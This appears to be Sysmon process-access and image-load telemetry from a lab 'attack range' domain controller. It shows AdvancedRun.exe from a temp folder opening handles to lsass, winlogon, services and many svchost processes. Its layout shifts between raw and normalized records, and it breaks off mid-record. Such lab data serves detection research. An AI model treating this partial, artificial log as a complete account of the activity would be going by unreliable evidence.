AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075322Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075320Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
Common System fields for every record below: Version=3 Level=4 Opcode=0 Keywords=0x8000000000000000 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-mhaag-attack-range-139.attackrange.local RuleName=- ; Task equals EventID (10 = ProcessAccess, 7 = ImageLoad). Records are listed newest first.

CallTrace A (every GrantedAccess=0x1410 record): C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
CallTrace B (every GrantedAccess=0x1000 record; identical to A except the frame AdvancedRun.exe+ab6d in place of +ab4b): C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

EventRecordID=(header precedes this excerpt) EventID=10 UtcTime=2022-01-21 20:14:45.059 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAF5-61EA-3100-000000002702} TargetProcessId=660 TargetImage=C:\Windows\System32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\NETWORK SERVICE
EventRecordID=4075318 EventID=10 UtcTime=2022-01-21 20:14:45.059 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAF5-61EA-3000-000000002702} TargetProcessId=668 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075317 EventID=10 UtcTime=2022-01-21 20:14:45.059 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAF5-61EA-2F00-000000002702} TargetProcessId=2440 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075316 EventID=10 UtcTime=2022-01-21 20:14:45.059 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAF4-61EA-2D00-000000002702} TargetProcessId=2988 TargetImage=C:\Windows\System32\spoolsv.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075315 EventID=10 UtcTime=2022-01-21 20:14:45.059 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAF2-61EA-2C00-000000002702} TargetProcessId=2896 TargetImage=C:\Windows\system32\conhost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075309 EventID=10 UtcTime=2022-01-21 20:14:45.059 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAF2-61EA-2B00-000000002702} TargetProcessId=2888 TargetImage=C:\Users\Public\splunkd.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075304 EventID=10 UtcTime=2022-01-21 20:14:45.059 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAF0-61EA-2900-000000002702} TargetProcessId=2760 TargetImage=C:\Windows\System32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075301 EventID=10 UtcTime=2022-01-21 20:14:45.059 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE8-61EA-2000-000000002702} TargetProcessId=1516 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\NETWORK SERVICE
EventRecordID=4075294 EventID=7 UtcTime=2022-01-21 20:14:45.055 ProcessGuid={834264DD-1435-61EB-7B08-000000002702} ProcessId=5336 Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe ImageLoaded=C:\Windows\SysWOW64\psapi.dll FileVersion=10.0.14393.0 (rs1_release.160715-1616) Description=Process Status Helper Product=Microsoft® Windows® Operating System Company=Microsoft Corporation OriginalFileName=PSAPI Hashes=MD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6 Signed=true Signature=Microsoft Windows SignatureStatus=Valid User=ATTACKRANGE\Administrator
EventRecordID=4075292 EventID=10 UtcTime=2022-01-21 20:14:45.058 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1800-000000002702} TargetProcessId=1384 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\LOCAL SERVICE
EventRecordID=4075286 EventID=10 UtcTime=2022-01-21 20:14:45.058 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1700-000000002702} TargetProcessId=1300 TargetImage=C:\Windows\System32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075285 EventID=10 UtcTime=2022-01-21 20:14:45.058 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1600-000000002702} TargetProcessId=1264 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\LOCAL SERVICE
EventRecordID=4075284 EventID=10 UtcTime=2022-01-21 20:14:45.057 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1500-000000002702} TargetProcessId=1064 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\NETWORK SERVICE
EventRecordID=4075283 EventID=10 UtcTime=2022-01-21 20:14:45.057 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1400-000000002702} TargetProcessId=352 TargetImage=C:\Windows\System32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\LOCAL SERVICE
EventRecordID=4075282 EventID=10 UtcTime=2022-01-21 20:14:45.057 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1300-000000002702} TargetProcessId=832 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\LOCAL SERVICE
EventRecordID=4075281 EventID=10 UtcTime=2022-01-21 20:14:45.057 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1200-000000002702} TargetProcessId=820 TargetImage=C:\Windows\system32\dwm.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=Window Manager\DWM-1
EventRecordID=4075280 EventID=10 UtcTime=2022-01-21 20:14:45.057 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1100-000000002702} TargetProcessId=488 TargetImage=C:\Windows\System32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075279 EventID=10 UtcTime=2022-01-21 20:14:45.057 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-1000-000000002702} TargetProcessId=92 TargetImage=C:\Windows\System32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\NETWORK SERVICE
EventRecordID=4075278 EventID=10 UtcTime=2022-01-21 20:14:45.056 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE7-61EA-0F00-000000002702} TargetProcessId=364 TargetImage=C:\Windows\system32\LogonUI.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075277 EventID=10 UtcTime=2022-01-21 20:14:45.056 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE6-61EA-0E00-000000002702} TargetProcessId=932 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\NETWORK SERVICE
EventRecordID=4075276 EventID=10 UtcTime=2022-01-21 20:14:45.056 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE6-61EA-0D00-000000002702} TargetProcessId=876 TargetImage=C:\Windows\system32\svchost.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075275 EventID=10 UtcTime=2022-01-21 20:14:45.056 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE4-61EA-0C00-000000002702} TargetProcessId=652 TargetImage=C:\Windows\system32\lsass.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075274 EventID=10 UtcTime=2022-01-21 20:14:45.056 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE4-61EA-0A00-000000002702} TargetProcessId=628 TargetImage=C:\Windows\system32\services.exe GrantedAccess=0x1000 CallTrace=B SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075273 EventID=10 UtcTime=2022-01-21 20:14:45.056 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE4-61EA-0900-000000002702} TargetProcessId=576 TargetImage=C:\Windows\system32\winlogon.exe GrantedAccess=0x1410 CallTrace=A SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075271 EventID=10 UtcTime=2022-01-21 20:14:45.056 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE4-61EA-0800-000000002702} TargetProcessId=500 TargetImage=C:\Windows\system32\csrss.exe GrantedAccess=0x1000 CallTrace=B SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075270 EventID=10 UtcTime=2022-01-21 20:14:45.055 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE4-61EA-0700-000000002702} TargetProcessId=492 TargetImage=C:\Windows\system32\wininit.exe GrantedAccess=0x1000 CallTrace=B SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075269 EventID=10 UtcTime=2022-01-21 20:14:45.055 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE4-61EA-0500-000000002702} TargetProcessId=420 TargetImage=C:\Windows\system32\csrss.exe GrantedAccess=0x1000 CallTrace=B SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075268 EventID=10 UtcTime=2022-01-21 20:14:45.055 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE2-61EA-0200-000000002702} TargetProcessId=320 TargetImage=C:\Windows\System32\smss.exe GrantedAccess=0x1000 CallTrace=B SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075267 EventID=10 UtcTime=2022-01-21 20:14:45.054 SourceProcessGUID={834264DD-1435-61EB-7B08-000000002702} SourceProcessId=5336 SourceThreadId=1504 SourceImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe TargetProcessGUID={834264DD-DAE2-61EA-EB03-000000000000} TargetProcessId=4 TargetImage=System GrantedAccess=0x1000 CallTrace=B SourceUser=ATTACKRANGE\Administrator TargetUser=NT AUTHORITY\SYSTEM
EventRecordID=4075266 EventID=10 UtcTime=2022-01-21 
20:14:45.047{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004075265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.036{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.033{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.032{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.032{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.031{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.030{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.029{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft 